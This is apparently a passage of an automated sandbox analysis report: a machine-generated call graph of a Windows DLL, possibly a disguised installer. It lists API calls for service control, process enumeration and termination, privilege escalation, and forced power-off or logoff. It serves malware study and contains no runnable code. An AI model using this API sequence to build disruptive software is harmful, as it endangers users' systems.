63117 6cd06050 6 API calls 2 library calls 63107->63117 63111 6cd05d10 63110->63111 63112 6cd0f1fb 63110->63112 63116 6cd05d23 63111->63116 63122 6cd073b9 LeaveCriticalSection 63111->63122 63123 6cd0f1d6 LeaveCriticalSection 63112->63123 63115 6cd0f202 63115->63083 63116->63083 63117->63082 63118->63085 63119->63087 63120->63107 63121->63107 63122->63116 63123->63115 63125 6cd06270 63124->63125 63126 6cbd1dea 63125->63126 63133 6cd0eb6a 63125->63133 63126->63090 63132 6cd0b383 18 API calls __wsopen_s 63126->63132 63128 6cd062bc 63128->63126 63144 6cd0e878 65 API calls 63128->63144 63130 6cd062d7 63130->63126 63145 6cd0f938 63130->63145 63132->63094 63135 6cd0eb75 __wsopen_s 63133->63135 63134 6cd0eb88 63170 6cd0ef40 18 API calls __wsopen_s 63134->63170 63135->63134 63136 6cd0eba8 63135->63136 63143 6cd0eb98 63136->63143 63156 6cd19c2c 63136->63156 63143->63128 63144->63130 63146 6cd0f944 __wsopen_s 63145->63146 63147 6cd0f963 63146->63147 63148 6cd0f94e 63146->63148 63152 6cd0f95e 63147->63152 63351 6cd0b3c9 EnterCriticalSection 63147->63351 63366 6cd0ef40 18 API calls __wsopen_s 63148->63366 63151 6cd0f980 63352 6cd0f9bc 63151->63352 63152->63126 63154 6cd0f98b 63367 6cd0f9b2 LeaveCriticalSection 63154->63367 63157 6cd19c38 __wsopen_s 63156->63157 63172 6cd0f1bf EnterCriticalSection 63157->63172 63159 6cd19c46 63173 6cd19cd0 63159->63173 63164 6cd19d92 63165 6cd19eb1 63164->63165 63197 6cd19f34 63165->63197 63168 6cd0ebec 63171 6cd0ec15 LeaveCriticalSection 63168->63171 63170->63143 63171->63143 63172->63159 63180 6cd19cf3 63173->63180 63174 6cd19c53 63187 6cd19c8c 63174->63187 63175 6cd19d4b 63192 6cd16005 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 63175->63192 63177 6cd19d54 63193 6cd135db HeapFree GetLastError _free 63177->63193 63180->63174 63180->63175 63180->63180 63190 6cd0b3c9 EnterCriticalSection 63180->63190 63191 6cd0b3dd LeaveCriticalSection 63180->63191 63181 6cd19d5d 63181->63174 63194 6cd15a3f 6 API calls 
std::_Lockit::_Lockit 63181->63194 63183 6cd19d7c 63195 6cd0b3c9 EnterCriticalSection 63183->63195 63186 6cd19d8f 63186->63174 63196 6cd0f1d6 LeaveCriticalSection 63187->63196 63189 6cd0ebc3 63189->63143 63189->63164 63190->63180 63191->63180 63192->63177 63193->63181 63194->63183 63195->63186 63196->63189 63198 6cd19f53 63197->63198 63199 6cd19f66 63198->63199 63203 6cd19f7b 63198->63203 63213 6cd0ef40 18 API calls __wsopen_s 63199->63213 63201 6cd19ec7 63201->63168 63210 6cd22dfe 63201->63210 63208 6cd1a09b 63203->63208 63214 6cd22cc8 37 API calls __wsopen_s 63203->63214 63205 6cd1a0eb 63205->63208 63215 6cd22cc8 37 API calls __wsopen_s 63205->63215 63207 6cd1a109 63207->63208 63216 6cd22cc8 37 API calls __wsopen_s 63207->63216 63208->63201 63217 6cd0ef40 18 API calls __wsopen_s 63208->63217 63218 6cd231b6 63210->63218 63213->63201 63214->63205 63215->63207 63216->63208 63217->63201 63220 6cd231c2 __wsopen_s 63218->63220 63219 6cd231c9 63236 6cd0ef40 18 API calls __wsopen_s 63219->63236 63220->63219 63221 6cd231f4 63220->63221 63227 6cd22e1e 63221->63227 63226 6cd22e19 63226->63168 63238 6cd0f4eb 63227->63238 63233 6cd22e54 63234 6cd22e86 63233->63234 63278 6cd135db HeapFree GetLastError _free 63233->63278 63237 6cd2324b LeaveCriticalSection __wsopen_s 63234->63237 63236->63226 63237->63226 63279 6cd0ab0b 63238->63279 63242 6cd0f50f 63243 6cd0ac16 63242->63243 63288 6cd0ac6e 63243->63288 63245 6cd0ac2e 63245->63233 63246 6cd22e8c 63245->63246 63303 6cd2330c 63246->63303 63252 6cd22ebe __dosmaperr 63252->63233 63253 6cd22fb2 GetFileType 63254 6cd22fbd GetLastError 63253->63254 63260 6cd23004 63253->63260 63332 6cd0e812 __dosmaperr _free 63254->63332 63255 6cd22f87 GetLastError 63255->63252 63257 6cd22f35 63257->63253 63257->63255 63331 6cd23277 CreateFileW 63257->63331 63259 6cd22fcb CloseHandle 63259->63252 63263 6cd22ff4 63259->63263 63333 6cd205d0 SetStdHandle __dosmaperr __wsopen_s 63260->63333 63261 6cd22f7a 63261->63253 63261->63255 63263->63252 63264 
6cd23025 63265 6cd23071 63264->63265 63334 6cd23486 70 API calls 2 library calls 63264->63334 63269 6cd23078 63265->63269 63348 6cd23530 70 API calls 2 library calls 63265->63348 63268 6cd230a6 63268->63269 63270 6cd230b4 63268->63270 63335 6cd1a745 63269->63335 63270->63252 63272 6cd23130 CloseHandle 63270->63272 63349 6cd23277 CreateFileW 63272->63349 63274 6cd2315b 63274->63263 63275 6cd23165 GetLastError 63274->63275 63276 6cd23171 __dosmaperr 63275->63276 63350 6cd2053f SetStdHandle __dosmaperr __wsopen_s 63276->63350 63278->63234 63280 6cd0ab22 63279->63280 63281 6cd0ab2b 63279->63281 63280->63242 63287 6cd157f5 5 API calls std::_Lockit::_Lockit 63280->63287 63281->63280 63282 6cd137d2 __Getctype 37 API calls 63281->63282 63283 6cd0ab4b 63282->63283 63284 6cd13d48 __Getctype 37 API calls 63283->63284 63285 6cd0ab61 63284->63285 63286 6cd13d75 __fassign 37 API calls 63285->63286 63286->63280 63287->63242 63289 6cd0ac96 63288->63289 63290 6cd0ac7c 63288->63290 63292 6cd0acbc 63289->63292 63293 6cd0ac9d 63289->63293 63291 6cd0abfc __wsopen_s HeapFree GetLastError 63290->63291 63294 6cd0ac86 __dosmaperr 63291->63294 63295 6cd13663 __fassign MultiByteToWideChar 63292->63295 63293->63294 63296 6cd0abbd __wsopen_s HeapFree GetLastError 63293->63296 63294->63245 63297 6cd0accb 63295->63297 63296->63294 63298 6cd0acd2 GetLastError 63297->63298 63299 6cd0abbd __wsopen_s HeapFree GetLastError 63297->63299 63301 6cd0acf8 63297->63301 63298->63294 63299->63301 63300 6cd13663 __fassign MultiByteToWideChar 63302 6cd0ad0f 63300->63302 63301->63294 63301->63300 63302->63294 63302->63298 63304 6cd2332d 63303->63304 63306 6cd23347 63303->63306 63304->63306 63307 6cd0ef40 __wsopen_s 18 API calls 63304->63307 63305 6cd2329c __wsopen_s 18 API calls 63310 6cd2337f 63305->63310 63306->63305 63307->63306 63308 6cd233ae 63309 6cd24731 __wsopen_s 18 API calls 63308->63309 63315 6cd22ea9 63308->63315 63311 6cd233fc 63309->63311 63310->63308 63313 6cd0ef40 __wsopen_s 18 API calls 
63310->63313 63312 6cd23479 63311->63312 63311->63315 63314 6cd0ef6d __Getctype 11 API calls 63312->63314 63313->63308 63316 6cd23485 63314->63316 63315->63252 63317 6cd2042c 63315->63317 63318 6cd20438 __wsopen_s 63317->63318 63319 6cd0f1bf std::_Lockit::_Lockit EnterCriticalSection 63318->63319 63322 6cd2043f 63319->63322 63320 6cd20486 63323 6cd20536 __wsopen_s LeaveCriticalSection 63320->63323 63321 6cd20464 63324 6cd20662 __wsopen_s 11 API calls 63321->63324 63322->63320 63322->63321 63327 6cd204d3 EnterCriticalSection 63322->63327 63325 6cd204a6 63323->63325 63326 6cd20469 63324->63326 63325->63252 63330 6cd23277 CreateFileW 63325->63330 63326->63320 63328 6cd207b0 __wsopen_s EnterCriticalSection 63326->63328 63327->63320 63329 6cd204e0 LeaveCriticalSection 63327->63329 63328->63320 63329->63322 63330->63257 63331->63261 63332->63259 63333->63264 63334->63265 63336 6cd203c2 __wsopen_s 18 API calls 63335->63336 63338 6cd1a755 63336->63338 63337 6cd1a75b 63340 6cd2053f __wsopen_s SetStdHandle 63337->63340 63338->63337 63339 6cd1a78d 63338->63339 63341 6cd203c2 __wsopen_s 18 API calls 63338->63341 63339->63337 63342 6cd203c2 __wsopen_s 18 API calls 63339->63342 63347 6cd1a7b3 __dosmaperr 63340->63347 63343 6cd1a784 63341->63343 63344 6cd1a799 CloseHandle 63342->63344 63345 6cd203c2 __wsopen_s 18 API calls 63343->63345 63344->63337 63346 6cd1a7a5 GetLastError 63344->63346 63345->63339 63346->63337 63347->63252 63348->63268 63349->63274 63350->63263 63351->63151 63353 6cd0f9c9 63352->63353 63354 6cd0f9de 63352->63354 63390 6cd0ef40 18 API calls __wsopen_s 63353->63390 63364 6cd0f9d9 63354->63364 63368 6cd0fad9 63354->63368 63361 6cd0fa01 63383 6cd1a6b8 63361->63383 63363 6cd0fa07 63363->63364 63391 6cd135db HeapFree GetLastError _free 63363->63391 63364->63154 63366->63152 63367->63152 63369 6cd0faf1 63368->63369 63370 6cd0f9f3 63368->63370 63369->63370 63371 6cd18a80 18 API calls 63369->63371 63374 6cd1755e 63370->63374 63372 6cd0fb0f 63371->63372 63392 6cd1a98c 
63372->63392 63375 6cd17575 63374->63375 63376 6cd0f9fb 63374->63376 63375->63376 63475 6cd135db HeapFree GetLastError _free 63375->63475 63378 6cd18a80 63376->63378 63379 6cd18aa1 63378->63379 63380 6cd18a8c 63378->63380 63379->63361 63476 6cd0ef40 18 API calls __wsopen_s 63380->63476 63382 6cd18a9c 63382->63361 63384 6cd1a6de 63383->63384 63388 6cd1a6c9 __dosmaperr 63383->63388 63385 6cd1a705 63384->63385 63387 6cd1a727 __dosmaperr 63384->63387 63477 6cd1a7e1 63385->63477 63485 6cd0ef40 18 API calls __wsopen_s 63387->63485 63388->63363 63390->63364 63391->63364 63393 6cd1a998 __wsopen_s 63392->63393 63394 6cd1a9ea 63393->63394 63396 6cd1aa53 __dosmaperr 63393->63396 63402 6cd1a9a0 __dosmaperr 63393->63402 63403 6cd207b0 EnterCriticalSection 63394->63403 63433 6cd0ef40 18 API calls __wsopen_s 63396->63433 63397 6cd1a9f0 63400 6cd1aa0c __dosmaperr 63397->63400 63404 6cd1aa7e 63397->63404 63432 6cd1aa4b LeaveCriticalSection __wsopen_s 63400->63432 63402->63370 63403->63397 63405 6cd1aaa0 63404->63405 63431 6cd1aabc __dosmaperr 63404->63431 63406 6cd1aaf4 63405->63406 63407 6cd1aaa4 __dosmaperr 63405->63407 63408 6cd1ab07 63406->63408 63442 6cd19a89 20 API calls __wsopen_s 63406->63442 63441 6cd0ef40 18 API calls __wsopen_s 63407->63441 63434 6cd1ac60 63408->63434 63413 6cd1ab1d 63415 6cd1ab21 63413->63415 63416 6cd1ab46 63413->63416 63414 6cd1ab5c 63417 6cd1ab70 63414->63417 63418 6cd1abb5 WriteFile 63414->63418 63415->63431 63443 6cd1b07b 6 API calls __wsopen_s 63415->63443 63444 6cd1acd1 43 API calls 5 library calls 63416->63444 63421 6cd1aba5 63417->63421 63422 6cd1ab7b 63417->63422 63420 6cd1abd9 GetLastError 63418->63420 63418->63431 63420->63431 63447 6cd1b0e3 7 API calls 2 library calls 63421->63447 63425 6cd1ab80 63422->63425 63426 6cd1ab95 63422->63426 63427 6cd1ab85 63425->63427 63425->63431 63446 6cd1b2a7 8 API calls 3 library calls 63426->63446 63445 6cd1b1be 7 API calls 2 library calls 63427->63445 63429 6cd1ab93 63429->63431 63431->63400 63432->63402 
63433->63402 63435 6cd20805 __wsopen_s 18 API calls 63434->63435 63437 6cd1ac71 63435->63437 63436 6cd1ab18 63436->63413 63436->63414 63437->63436 63448 6cd137d2 GetLastError 63437->63448 63440 6cd1acae GetConsoleMode 63440->63436 63441->63431 63442->63408 63443->63431 63444->63431 63445->63429 63446->63429 63447->63429 63449 6cd137e9 63448->63449 63453 6cd137ef 63448->63453 63451 6cd15943 __Getctype 6 API calls 63449->63451 63450 6cd15982 __Getctype 6 API calls 63452 6cd1380d 63450->63452 63451->63453 63454 6cd13811 63452->63454 63455 6cd137f5 SetLastError 63452->63455 63453->63450 63453->63455 63456 6cd16005 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 63454->63456 63461 6cd13883 63455->63461 63462 6cd13889 63455->63462 63458 6cd1381d 63456->63458 63459 6cd13825 63458->63459 63460 6cd1383c 63458->63460 63463 6cd15982 __Getctype 6 API calls 63459->63463 63465 6cd15982 __Getctype 6 API calls 63460->63465 63461->63436 63461->63440 63464 6cd0f8e9 __Getctype 35 API calls 63462->63464 63467 6cd13833 63463->63467 63468 6cd1388e 63464->63468 63466 6cd13848 63465->63466 63469 6cd1385d 63466->63469 63470 6cd1384c 63466->63470 63472 6cd135db _free HeapFree GetLastError 63467->63472 63474 6cd135db _free HeapFree GetLastError 63469->63474 63471 6cd15982 __Getctype 6 API calls 63470->63471 63471->63467 63473 6cd13839 63472->63473 63473->63455 63474->63473 63475->63376 63476->63382 63478 6cd1a7ed __wsopen_s 63477->63478 63486 6cd207b0 EnterCriticalSection 63478->63486 63480 6cd1a7fb 63481 6cd1a745 __wsopen_s 21 API calls 63480->63481 63482 6cd1a828 63480->63482 63481->63482 63487 6cd1a861 LeaveCriticalSection __wsopen_s 63482->63487 63484 6cd1a84a 63484->63388 63485->63388 63486->63480 63487->63484 63488->63033 63489->63035 63490->63033 63491->63033 63492->63033 63494 6cbd022e 63493->63494 63495 6cba70c4 63494->63495 63500 6cd105fb 63494->63500 63495->63046 63497->63047 63498->63049 63499->63051 63501 6cd10626 63500->63501 63502 6cd10609 63500->63502 
63501->63494 63502->63501 63503 6cd10616 63502->63503 63504 6cd1062a 63502->63504 63516 6cd0ef40 18 API calls __wsopen_s 63503->63516 63508 6cd10822 63504->63508 63509 6cd1082e __wsopen_s 63508->63509 63517 6cd0b3c9 EnterCriticalSection 63509->63517 63511 6cd1083c 63518 6cd107df 63511->63518 63515 6cd1065c 63515->63494 63516->63501 63517->63511 63526 6cd173c6 63518->63526 63524 6cd10819 63525 6cd10871 LeaveCriticalSection 63524->63525 63525->63515 63527 6cd18a80 18 API calls 63526->63527 63528 6cd173d7 63527->63528 63529 6cd20805 __wsopen_s 18 API calls 63528->63529 63530 6cd173dd __wsopen_s 63529->63530 63531 6cd107f3 63530->63531 63543 6cd135db HeapFree GetLastError _free 63530->63543 63533 6cd1065e 63531->63533 63535 6cd10670 63533->63535 63537 6cd1068e 63533->63537 63534 6cd1067e 63544 6cd0ef40 18 API calls __wsopen_s 63534->63544 63535->63534 63535->63537 63540 6cd106a6 _Yarn 63535->63540 63542 6cd17479 62 API calls 63537->63542 63538 6cd0fad9 62 API calls 63538->63540 63539 6cd18a80 18 API calls 63539->63540 63540->63537 63540->63538 63540->63539 63541 6cd1a98c __wsopen_s 62 API calls 63540->63541 63541->63540 63542->63524 63543->63531 63544->63537 63545 6cb84b53 63546 6cd05863 std::_Facet_Register 4 API calls 63545->63546 63547 6cb84b5c _Yarn 63546->63547 63548 6ccf98b0 2 API calls 63547->63548 63553 6cb84bae std::ios_base::_Ios_base_dtor 63548->63553 63549 6cba639e 63749 6cd0ef50 18 API calls 2 library calls 63549->63749 63551 6cb84cff 63552 6cb85164 CreateFileA CloseHandle 63557 6cb851ec 63552->63557 63553->63549 63553->63551 63553->63552 63554 6cb9245a _Yarn _strlen 63553->63554 63554->63549 63555 6ccf98b0 2 API calls 63554->63555 63558 6cb92a83 std::ios_base::_Ios_base_dtor 63555->63558 63703 6cd03f30 OpenSCManagerA 63557->63703 63558->63549 63707 6cceeff0 63558->63707 63559 6cba63b2 63750 6cb815e0 18 API calls std::ios_base::_Ios_base_dtor 63559->63750 63560 6cb8fc00 63741 6cd04050 CreateToolhelp32Snapshot 63560->63741 63564 6cd05863 
IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63599 6cb85478 std::ios_base::_Ios_base_dtor _Yarn _strlen 63564->63599 63566 6cb937d0 Sleep 63609 6cb937e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 63566->63609 63567 6ccf98b0 2 API calls 63567->63599 63568 6cd04050 4 API calls 63584 6cb9053a 63568->63584 63569 6cd04050 4 API calls 63594 6cb912e2 63569->63594 63571 6cba64f8 63572 6cb8ffe3 63572->63568 63578 6cb90abc 63572->63578 63573 6cba6ba0 104 API calls 63573->63599 63574 6cba6e60 32 API calls 63574->63599 63576 6cba7090 77 API calls 63576->63599 63577 6cd04050 4 API calls 63577->63578 63578->63554 63578->63569 63579 6cd04050 4 API calls 63598 6cb91dd9 63579->63598 63580 6cb9211c 63580->63554 63582 6cb9241a 63580->63582 63585 6cceeff0 11 API calls 63582->63585 63583 6ccf98b0 2 API calls 63583->63609 63584->63577 63584->63578 63587 6cb9244d 63585->63587 63586 6cb86722 63717 6cd00900 25 API calls 4 library calls 63586->63717 63747 6cd04b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63587->63747 63589 6cb92452 Sleep 63589->63554 63590 6cb916ac 63591 6cb86162 63593 6cb8740b 63718 6cd03e00 CreateProcessA 63593->63718 63594->63579 63594->63580 63594->63590 63595 6cd04050 4 API calls 63595->63580 63596 6cba6ba0 104 API calls 63596->63609 63597 6cba6e60 32 API calls 63597->63609 63598->63580 63598->63595 63599->63549 63599->63560 63599->63564 63599->63567 63599->63573 63599->63574 63599->63576 63599->63586 63599->63591 63716 6cbce010 67 API calls 63599->63716 63600 6cba7090 77 API calls 63600->63609 63602 6cb8775a _strlen 63602->63549 63603 6cb87ba9 63602->63603 63604 6cb87b92 63602->63604 63607 6cb87b43 _Yarn 63602->63607 63606 6cd05863 std::_Facet_Register 4 API calls 63603->63606 63605 6cd05863 std::_Facet_Register 4 API calls 63604->63605 63605->63607 63606->63607 63608 6ccf98b0 2 API calls 63607->63608 63617 6cb87be7 std::ios_base::_Ios_base_dtor 
63608->63617 63609->63549 63609->63583 63609->63596 63609->63597 63609->63600 63748 6cbce010 67 API calls 63609->63748 63610 6cd03e00 4 API calls 63621 6cb88a07 63610->63621 63611 6cb89d68 63613 6cd05863 std::_Facet_Register 4 API calls 63611->63613 63612 6cb89d7f 63614 6cd05863 std::_Facet_Register 4 API calls 63612->63614 63615 6cb89d18 _Yarn 63613->63615 63614->63615 63616 6ccf98b0 2 API calls 63615->63616 63625 6cb89dbd std::ios_base::_Ios_base_dtor 63616->63625 63617->63549 63617->63610 63618 6cb8962c _strlen 63617->63618 63619 6cb88387 63617->63619 63618->63549 63618->63611 63618->63612 63618->63615 63620 6cd03e00 4 API calls 63629 6cb89120 63620->63629 63621->63620 63622 6cd03e00 4 API calls 63639 6cb8a215 _strlen 63622->63639 63623 6cd03e00 4 API calls 63624 6cb89624 63623->63624 63722 6cd04b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63624->63722 63625->63549 63625->63622 63630 6cb8e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 63625->63630 63626 6cd05863 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 63626->63630 63628 6ccf98b0 2 API calls 63628->63630 63629->63623 63630->63549 63630->63626 63630->63628 63631 6cb8f7b1 63630->63631 63632 6cb8ed02 Sleep 63630->63632 63740 6cd04b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63631->63740 63651 6cb8e8c1 63632->63651 63634 6cb8a9bb 63638 6cd05863 std::_Facet_Register 4 API calls 63634->63638 63635 6cb8a9a4 63637 6cd05863 std::_Facet_Register 4 API calls 63635->63637 63636 6cb8e8dd GetCurrentProcess TerminateProcess 63636->63630 63646 6cb8a953 _Yarn _strlen 63637->63646 63638->63646 63639->63549 63639->63634 63639->63635 63639->63646 63640 6cd03e00 4 API calls 63640->63651 63641 6cb8fbb8 63642 6cb8fbe8 ExitWindowsEx Sleep 63641->63642 63642->63560 63643 6cb8f7c0 63643->63641 63644 6cb8b009 63648 6cd05863 std::_Facet_Register 4 API calls 
63644->63648 63645 6cb8aff0 63647 6cd05863 std::_Facet_Register 4 API calls 63645->63647 63646->63559 63646->63644 63646->63645 63649 6cb8afa0 _Yarn 63646->63649 63647->63649 63648->63649 63723 6cd04780 63649->63723 63651->63630 63651->63636 63651->63640 63652 6cb8b059 std::ios_base::_Ios_base_dtor _strlen 63652->63549 63653 6cb8b42c 63652->63653 63654 6cb8b443 63652->63654 63657 6cb8b3da _Yarn _strlen 63652->63657 63655 6cd05863 std::_Facet_Register 4 API calls 63653->63655 63656 6cd05863 std::_Facet_Register 4 API calls 63654->63656 63655->63657 63656->63657 63657->63559 63658 6cb8b79e 63657->63658 63659 6cb8b7b7 63657->63659 63662 6cb8b751 _Yarn 63657->63662 63660 6cd05863 std::_Facet_Register 4 API calls 63658->63660 63661 6cd05863 std::_Facet_Register 4 API calls 63659->63661 63660->63662 63661->63662 63663 6cd04780 104 API calls 63662->63663 63664 6cb8b804 std::ios_base::_Ios_base_dtor _strlen 63663->63664 63664->63549 63665 6cb8bc0f 63664->63665 63666 6cb8bc26 63664->63666 63669 6cb8bbbd _Yarn _strlen 63664->63669 63667 6cd05863 std::_Facet_Register 4 API calls 63665->63667 63668 6cd05863 std::_Facet_Register 4 API calls 63666->63668 63667->63669 63668->63669 63669->63559 63670 6cb8c08e 63669->63670 63671 6cb8c075 63669->63671 63674 6cb8c028 _Yarn 63669->63674 63673 6cd05863 std::_Facet_Register 4 API calls 63670->63673 63672 6cd05863 std::_Facet_Register 4 API calls 63671->63672 63672->63674 63673->63674 63675 6cd04780 104 API calls 63674->63675 63680 6cb8c0db std::ios_base::_Ios_base_dtor _strlen 63675->63680 63676 6cb8c7bc 63679 6cd05863 std::_Facet_Register 4 API calls 63676->63679 63677 6cb8c7a5 63678 6cd05863 std::_Facet_Register 4 API calls 63677->63678 63687 6cb8c753 _Yarn _strlen 63678->63687 63679->63687 63680->63549 63680->63676 63680->63677 63680->63687 63681 6cb8d3ed 63683 6cd05863 std::_Facet_Register 4 API calls 63681->63683 63682 6cb8d406 63684 6cd05863 std::_Facet_Register 4 API calls 63682->63684 63685 6cb8d39a _Yarn 63683->63685 
63684->63685 63686 6cd04780 104 API calls 63685->63686 63688 6cb8d458 std::ios_base::_Ios_base_dtor _strlen 63686->63688 63687->63559 63687->63681 63687->63682 63687->63685 63693 6cb8cb2f 63687->63693 63688->63549 63689 6cb8d8bb 63688->63689 63690 6cb8d8a4 63688->63690 63694 6cb8d852 _Yarn _strlen 63688->63694 63692 6cd05863 std::_Facet_Register 4 API calls 63689->63692 63691 6cd05863 std::_Facet_Register 4 API calls 63690->63691 63691->63694 63692->63694 63694->63559 63695 6cb8dccf 63694->63695 63696 6cb8dcb6 63694->63696 63699 6cb8dc69 _Yarn 63694->63699 63698 6cd05863 std::_Facet_Register 4 API calls 63695->63698 63697 6cd05863 std::_Facet_Register 4 API calls 63696->63697 63697->63699 63698->63699 63700 6cd04780 104 API calls 63699->63700 63702 6cb8dd1c std::ios_base::_Ios_base_dtor 63700->63702 63701 6cd03e00 4 API calls 63701->63630 63702->63549 63702->63701 63705 6cd03f66 63703->63705 63704 6cd03ffb OpenServiceA 63704->63705 63705->63704 63706 6cd04042 63705->63706 63706->63599 63711 6ccef003 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 63707->63711 63708 6ccf1a40 CloseHandle 63708->63711 63709 6ccf1bac CloseHandle 63709->63711 63710 6cb937cb 63715 6cd04b80 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 63710->63715 63711->63708 63711->63709 63711->63710 63713 6ccf10d2 CloseHandle 63711->63713 63714 6ccdc310 ReadFile WriteFile WriteFile WriteFile 63711->63714 63751 6ccdb750 63711->63751 63713->63711 63714->63711 63715->63566 63716->63599 63717->63593 63719 6cd03e90 63718->63719 63720 6cd03ed0 WaitForSingleObject CloseHandle CloseHandle 63719->63720 63721 6cd03ec4 63719->63721 63720->63719 63721->63602 63722->63618 63724 6cd047d7 63723->63724 63762 6cd04e10 63724->63762 63726 6cd047e8 63727 6cba6ba0 104 API calls 63726->63727 63737 6cd0480c 63727->63737 63728 6cd04887 63814 6cbce010 67 API calls 63728->63814 63730 6cd048bf std::ios_base::_Ios_base_dtor 63815 6cbce010 67 API calls 63730->63815 
63733 6cd04874 63799 6cd049b0 63733->63799 63736 6cd04902 std::ios_base::_Ios_base_dtor 63736->63652 63737->63728 63737->63733 63781 6cd05160 63737->63781 63789 6cbe2590 63737->63789 63738 6cd0487c 63739 6cba7090 77 API calls 63738->63739 63739->63728 63740->63643 63743 6cd04087 std::locale::_Setgloballocale 63741->63743 63742 6cd04195 Process32NextW 63742->63743 63743->63742 63744 6cd040e4 CloseHandle 63743->63744 63745 6cd041c7 63743->63745 63746 6cd04160 Process32FirstW 63743->63746 63744->63743 63745->63572 63746->63743 63747->63589 63748->63609 63750->63571 63752 6ccdb763 _Yarn __wsopen_s std::locale::_Setgloballocale 63751->63752 63753 6ccdc2b0 63752->63753 63755 6ccdb900 CreateFileA 63752->63755 63756 6ccda500 63752->63756 63753->63711 63755->63752 63757 6ccda513 __wsopen_s std::locale::_Setgloballocale 63756->63757 63758 6ccdb0ef WriteFile 63757->63758 63759 6ccdb735 63757->63759 63760 6ccda7f2 WriteFile 63757->63760 63761 6ccdab96 ReadFile 63757->63761 63758->63757 63759->63752 63760->63757 63761->63757 63763 6cd04e45 63762->63763 63764 6cbd2020 52 API calls 63763->63764 63765 6cd04ee6 63764->63765 63766 6cd05863 std::_Facet_Register 4 API calls 63765->63766 63767 6cd04f1e 63766->63767 63768 6cd06147 43 API calls 63767->63768 63769 6cd04f32 63768->63769 63770 6cbd1d90 89 API calls 63769->63770 63771 6cd04fdb 63770->63771 63772 6cd0500c 63771->63772 63816 6cbd2250 30 API calls 63771->63816 63772->63726 63774 6cd05046 63817 6cbd26e0 24 API calls 4 library calls 63774->63817 63776 6cd05058 63818 6cd08199 RaiseException 63776->63818 63778 6cd0506d 63819 6cbce010 67 API calls 63778->63819 63780 6cd0507f 63780->63726 63782 6cd051ad 63781->63782 63820 6cd053c0 63782->63820 63784 6cd051c5 63787 6cd0529c 63784->63787 63838 6cbd2250 30 API calls 63784->63838 63839 6cbd26e0 24 API calls 4 library calls 63784->63839 63840 6cd08199 RaiseException 63784->63840 63787->63737 63790 6cbe25cf 63789->63790 63797 6cbe25e3 63790->63797 63849 6cbd3560 32 API calls 
std::_Xinvalid_argument 63790->63849 63793 6cbe269e 63794 6cbe26b1 63793->63794 63850 6cbd37e0 32 API calls std::_Xinvalid_argument 63793->63850 63794->63737 63797->63793 63851 6cbd2250 30 API calls 63797->63851 63852 6cbd26e0 24 API calls 4 library calls 63797->63852 63853 6cd08199 RaiseException 63797->63853 63800 6cd049be 63799->63800 63802 6cd049f1 63799->63802 63803 6cbd01f0 64 API calls 63800->63803 63801 6cd04aa3 63801->63738 63802->63801 63854 6cbd2250 30 API calls 63802->63854 63804 6cd049e4 63803->63804 63806 6cd0f938 67 API calls 63804->63806 63806->63802 63807 6cd04ace 63855 6cbd2340 24 API calls 63807->63855 63809 6cd04ade 63856 6cd08199 RaiseException 63809->63856 63811 6cd04ae9 63857 6cbce010 67 API calls 63811->63857 63813 6cd04b42 std::ios_base::_Ios_base_dtor 63813->63738 63814->63730 63815->63736 63816->63774 63817->63776 63818->63778 63819->63780 63821 6cd05428 63820->63821 63822 6cd053fc 63820->63822 63827 6cd05439 63821->63827 63841 6cbd3560 32 API calls std::_Xinvalid_argument 63821->63841 63836 6cd05421 63822->63836 63843 6cbd2250 30 API calls 63822->63843 63825 6cd05608 63844 6cbd2340 24 API calls 63825->63844 63827->63836 63842 6cbd2f60 42 API calls 4 library calls 63827->63842 63828 6cd05617 63845 6cd08199 RaiseException 63828->63845 63832 6cd05647 63847 6cbd2340 24 API calls 63832->63847 63834 6cd0565d 63848 6cd08199 RaiseException 63834->63848 63836->63784 63837 6cd05473 63837->63836 63846 6cbd2250 30 API calls 63837->63846 63838->63784 63839->63784 63840->63784 63841->63827 63842->63837 63843->63825 63844->63828 63845->63837 63846->63832 63847->63834 63848->63836 63849->63797 63850->63794 63851->63797 63852->63797 63853->63797 63854->63807 63855->63809 63856->63811 63857->63813 63858 6cd0dd5f 63859 6cd0dd6b __wsopen_s 63858->63859 63860 6cd0dd72 GetLastError ExitThread 63859->63860 63861 6cd0dd7f 63859->63861 63862 6cd137d2 __Getctype 37 API calls 63861->63862 63863 6cd0dd84 63862->63863 63870 6cd18b86 63863->63870 63867 6cd0dd9b 63876 
6cd0dcca 16 API calls 2 library calls 63867->63876 63869 6cd0ddbd 63871 6cd0dd8f 63870->63871 63872 6cd18b98 GetPEB 63870->63872 63871->63867 63875 6cd15b8f 5 API calls std::_Lockit::_Lockit 63871->63875 63872->63871 63873 6cd18bab 63872->63873 63877 6cd15c38 5 API calls std::_Lockit::_Lockit 63873->63877 63875->63867 63876->63869 63877->63871
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1948792085.000000006CB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CB80000, based on PE: true
                                        • Associated: 00000006.00000002.1948759575.000000006CB80000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950126344.000000006CD26000.00000002.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950198884.000000006CD36000.00000008.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950819251.000000006CE01000.00000004.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1950853113.000000006CE07000.00000020.00000001.01000000.00000009.sdmp
                                        • Associated: 00000006.00000002.1951567614.000000006CEED000.00000002.00000001.01000000.00000009.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6cb80000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                        Similarity
